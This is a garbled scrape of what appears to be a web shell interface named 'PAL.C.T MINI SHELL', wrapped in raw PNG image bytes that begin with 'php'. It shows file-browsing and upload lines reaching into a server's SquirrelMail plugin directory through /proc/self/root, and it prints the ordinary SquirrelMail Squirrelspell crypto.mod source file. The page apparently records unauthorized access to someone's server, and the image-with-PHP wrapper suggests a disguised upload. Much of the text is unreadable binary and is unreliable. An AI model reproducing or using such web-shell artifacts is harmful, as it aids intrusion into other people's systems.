php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/usr/share/squirrelmail/plugins/squirrelspell/modules/
upload
files >> //proc/self/root/usr/share/squirrelmail/plugins/squirrelspell/modules/crypto.mod

<?php
/**
 * crypto.mod
 * ---------------
 * Squirrelspell module
 *
 * Copyright (c) 1999-2011 The SquirrelMail Project Team
 * Licensed under the GNU GPL. For full terms see the file COPYING.
 *
 * This module handles the encryption/decryption of the user dictionary
 * if the user so chooses from the options page.
 *
 * @author Konstantin Riabitsev <icon@duke.edu>
 * @version $Id: crypto.mod 14084 2011-01-06 02:44:03Z pdontthink $
 * @package plugins
 * @subpackage squirrelspell
 */

/**
 * Declaring globals for E_ALL
 */
global $SQSPELL_CRYPTO;

switch ($_POST['action']){
    case 'encrypt':
        /**
         * Let's encrypt the file and save it in an encrypted format.
         */
        $words=sqspell_getWords();
        /**
         * Flip the flag so the sqspell_writeWords function knows to encrypt
         * the message before writing it to the disk.
         */
        $SQSPELL_CRYPTO=true;
        /**
         * Call the function that does the actual encryption_decryption.
         */
        sqspell_writeWords($words);
        $msg='<p>'
            . _("Your personal dictionary has been encrypted and is now stored in an encrypted format.")
            . '</p>';
    break;
    case 'decrypt':
        /**
         * Let's decrypt the file and save it as plain text.
         */
        $words=sqspell_getWords();
        /**
         * Flip the flag and tell the sqspell_writeWords() function that we
         * want to save it plaintext.
         */
        $SQSPELL_CRYPTO=false;
        sqspell_writeWords($words);
        $msg='<p>'
            . _("Your personal dictionary has been decrypted and is now stored as plain text.")
            . '</p>';
    break;
    case '':
        /**
         * Wait, this shouldn't happen! :)
         */
        $msg = '<p>'._("No action requested.").'</p>';
    break;
}
sqspell_makePage( _("Personal Dictionary Crypto Settings"), null, $msg);

/**
 * For Emacs weenies:
 * Local variables:
 * mode: php
 * End:
 * vim: syntax=php
 */

?>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`